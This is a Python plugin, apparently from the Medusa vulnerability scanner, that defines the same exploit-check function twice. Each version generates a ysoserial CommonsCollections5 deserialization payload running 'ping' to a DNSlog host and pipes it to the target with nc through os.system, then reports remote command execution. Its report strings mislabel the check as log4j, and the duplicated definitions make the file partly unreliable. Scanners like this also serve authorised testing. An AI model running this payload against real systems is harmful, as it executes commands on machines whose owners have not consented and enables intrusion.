def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
dns = Dnslog()
os.system(
'java -jar {} CommonsCollections5 "ping {}" | nc {} {}'.format(
Ysoserial().result(), dns.dns_host(), url, port))
if dns.result():
Medusa = "{}存在log4j远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n请看DNSlog数据\r\n".format(
url, scheme + "://" + url + ":" + str(port))
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, ProxyIp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
dns = Dnslog()
os.system(
'java -jar {} CommonsCollections5 "ping {}" | nc {} {}'.format(
Ysoserial().result(), dns.dns_host(), url, port))
if dns.result():
Medusa = "{}存在log4j远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n请看DNSlog数据\r\n".format(
url, scheme + "://" + url + ":" + str(port))
_t = VulnerabilityInfo(Medusa)
web = ClassCongregation.VulnerabilityDetails(_t.info)
web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception:
_ = VulnerabilityInfo('').info.get('algroup')
_l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名